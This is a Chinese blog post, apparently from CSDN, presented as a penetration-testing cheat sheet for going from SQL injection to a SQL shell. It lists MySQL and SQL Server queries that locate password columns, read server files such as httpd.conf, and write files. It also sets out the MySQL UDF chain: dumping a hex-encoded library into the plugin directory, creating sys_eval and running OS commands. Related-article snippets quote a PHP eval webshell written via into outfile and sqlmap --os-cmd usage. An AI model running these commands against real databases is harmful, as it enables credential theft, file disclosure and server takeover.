安全渗透测试--sql注入之sql-shell

最新推荐文章于 2024-05-09 00:29:10 发布
最新推荐文章于 2024-05-09 00:29:10 发布
阅读量4.6k 收藏 7
点赞数
分类专栏: 技术 文章标签: 安全 渗透 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/langouster/article/details/99131511
版权

mysql

找到含有password字段的表

select table_name,column_name from information_schema.columns where column_name like '%pwd%' or column_name like '%pass%'

找到含有特定字符串的表名

select table_name from information_schema.tables where table_schema='库名' and table_name like '%use%';

获取当前的连接 等同show processlist

select host from information_schema.processlist

读写文件

# 高版本只允许操作secure_file_priv变量指定目录下的文件
select @@secure_file_priv

# 写文件  
# into dumpfile用于二进制文件,
select unhex('hexcode') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so'; 
# into outfile 主要的目的是导出 文本文件
select '123' into outfile  /var/www/1.html

#读文件
select load_file('/etc/httpd/conf/httpd.conf')

# 有的时候读取很慢 ,可以不读整个文件 下面先以DocumentRoot分割,获取查找第3个左边的部分
substring(substring_index(substring_index(load_file('/etc/httpd/conf/httpd.conf'),'DocumentRoot',3),'DocumentRoot',-1),1,20)

udf 相关

#找到现有的自定义函数
select * from mysql.func;

#  MySQL 5.0.67 开始udf需要在指定路径下
select @@plugin_dir

#导入udf库文件
select unhex('hexcode') into dumpfile '/usr/lib64/mysql/plugin/mysqludf.so';

#创建自定义函数
create function sys_eval returns string soname 'mysqludf.so';

# 执行自定义函数
select sys_eval('whoami');

sql server

找到含有password字段的表

select table_name,column_name from information_schema.columns where column_name like '%pwd%' or column_name like '%passw%'
种豆得豆1986
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
初使 SQL Shell (psql)
weixin_34408717的博客
05-08 2624
2019独角兽企业重金招聘Python工程师标准>>> ...
网络安全 sql注入工具sqlmap使用
01-13
Sqlmap是当前最流行的sql注入工具之一,广泛应用于网络安全领域,特别是在渗透测试和漏洞扫描领域。Sqlmap可以自动检测和利用SQL注入漏洞,获取数据库敏感信息,包括数据库结构、表名、字段名、数据内容等。 数据库...
2024年软件测试最全渗透测试-SQL注入检测_sql注入 在线检测(1),看这篇足矣了
2401_84765537的博客
05-09 684
而当我们使用 用户名‘:–的时候,!这时候对比两条sql就能发现,其实用户通过在用户名写入的sql符号将内部sql提前结束,并且。: SQL注入就是本来我只有我能操作数据库,本来只是让你输入内容就走,而你却输入命令,从而在我不知情下操作数据库。
sqlshell注入测试
zzz_781111的专栏
09-13 1630
1.整数型参数,必须intval转义,用addslashes转义不行 $test = $_REQUEST["test"]; $test = addslashes($test); $sql =" select * from tbl1 where id=$test"; print $sql; //输入test=1 or 1=1 得到 select * from tbl1 wher
sqlmap中的--sql-shell
qq_45751902的博客
10-25 7396
secure_file_priv的值在mysql配置文件my.ini中设置,这个参数用来限制数据导入导出。2、secure_file_priv 的值非NULL或包含了导出的绝对路径。outfile 和 dumpfile的路径不支持hex,必须有引号包裹。4、mysql连接用户有FILE权限/ROOT用户或ROOT权限。Mysql>=5.5.53 默认为NULL,即默认禁止导入导出。3、mysql服务有对网站可访问路径的写权限。5、GPC关闭//未对闭合用的引号转义。1、网站可访问路径的绝对路径。
【知识整理】利用SQL语句写shell的方法
命运的旋律的博客
03-22 3488
利用SQL语句写shell的方法 要利用sqlshell就需要在配置中满足以下条件: 在mysql的配置文件my.ini中,secure_file_priv为空(被注释掉或不填)或者secure_file_priv配置是目录地址。 未开启全局GPC 关于mysql的secure_file_priv属性得多说几句 当secure_file_priv为空时,mysql对导入导出文件是没有限制的 ...
SQL注入攻击与防护探析.pdf
09-19
SQL注入攻击是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库系统。攻击者通过在应用程序的输入字段中插入恶意SQL代码,利用程序处理用户输入时的不足,来操控数据库,获取敏感信息,甚至完全...
Shell脚本中执行sql语句操作mysql的5种方法
01-10
对于自动化运维,诸如备份恢复之类的,DBA经常需要将SQL语句封装到shell脚本。本文描述了在Linux环境下mysql数据库中,shell脚本下调用sql语句的几种方法,供大家参考。对于脚本输出的结果美化,需要进一步完善和调整。以下为具体的示例及其方法。 1、将SQL语句直接嵌入到shell脚本文件中 代码如下: –演示环境  [root@SZDB ~]# more /etc/issue  CentOS release 5.9 (Final)  Kernel \r on an \m    root@localhost[(none)]> show variables like ‘
渗透测试常用工具应用(PDF课件)
最新发布
05-30
使用darkmysqli进行sql注入.pdf 使用Kimi生成deb包进行代码捆绑实践.pdf Web传递获取靶机权限.pdf 使用EternalBlues进行Windows漏洞利用.pdf 使用cobaltstrike接口来传递MSF中的shell.pdf 使用Beef对客户端浏览器...
SQL——shell命令
qq_36912885的博客
09-02 1783
8.0之后的sql毛病是真鸡多,把这些常用的命令的都记录下来。里面包含了从安装到使用,远程登录,密码,redis,等等乱七八糟的问题。
PostgreSQL下的SQL Shell(psql)工具
07-18 2830
首发微信公众号:SQL数据库运维 原文链接:https://mp.weixin.qq.com/s?__biz=MzI1NTQyNzg3MQ==&mid=2247485130&idx=1&sn=9606e27c6e449bb44682888a28b93920&chksm=ea3752badd40dbac550cc06c87a6e2e91e50c80842716de6...
shellSQL
weixin_33941350的博客
05-20 184
光标移动指令? 对应方向键移动 h 左移一字符 k 上移一行 j 下移一行 l 右移一字符? 按行单位移动 0 移到行首 $ 移到行尾 nG 移到第n行 G 移到最后一行? 按页单位移动 ^ f 下卷一屏 ^ b 上卷一屏 ^ d 下卷半屏 ^ u 上...
第十四章 使用SQL Shell界面(三)
yaoxin521123的博客
04-02 1085
文章目录 第十四章 使用SQL Shell界面(三)SQL元数据、查询计划和性能指标显示元数据SHOW STATEMENTEXPLAIN and Show PlanSQL Shell PerformanceTransact-SQL支持Setting DIALECTSetting COMMANDPREFIX运行命令TSQL例子 第十四章 使用SQL Shell界面(三) SQL元数据、查询计划和性能指标 显示元数据 SQL Shell支持M或Metadata命令以显示有关当前查询的元数据信息。 对于每个结果
42、利用sql语句写入shell
weixin_41489908的博客
02-12 1782
目标ip:192.168.52.143 一、御剑扫描该地址 获取到重要信息: 1、网站的绝对路径 2、phpmyadmin,并且是默认账号密码:root 二、登录数据口后台,写入一句话木马 select ‘<?php eval($_POST[x]);?>’ into outfile ‘c:/phpstudy/www/xx.php’ 执行的时候报错 解决方法: 1、设置slow_...
第十四章 使用SQL Shell界面(一)
yaoxin521123的博客
03-31 2497
文章目录 第十四章 使用SQL Shell界面(一)执行SQL的其他方式调用SQL ShellGO命令输入参数执行ObjectScript命令浏览命名空间CALL 命令执行SQL脚本文件 第十四章 使用SQL Shell界面(一) 执行SQL的其他方式 可以使用$SYSTEM.SQL.Execute() 方法从Terminal命令行执行一行SQL代码,而无需调用SQL Shell。以下示例显示如何在终端提示下使用此方法: DHC-APP>SET result=$SYSTEM.SQL.Execute(
18. SQLMAP使用什么参数可以执行系统命令(1.5分) A.--os-shell B.--sql-cmd C. --os-cmd D. --sql-shell
06-13
正确答案是 C. --os-cmd。SQLMap 是一款常用的 SQL 注入工具,可以用于检测和利用 SQL 注入漏洞。在 SQLMap 中,可以使用 --os-cmd 参数执行操作系统命令,该参数用于在漏洞利用过程中获取系统权限或进行后渗透操作。例如,可以使用以下命令执行 whoami 命令:sqlmap -u "http://example.com/vuln.php?id=1" --os-cmd="whoami"。而其他选项中,--os-shell 参数用于获取一个交互式的系统命令 shell,--sql-cmd 参数用于在 SQL 注入漏洞中执行 SQL 语句,--sql-shell 参数用于获取一个交互式的 SQL shell

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值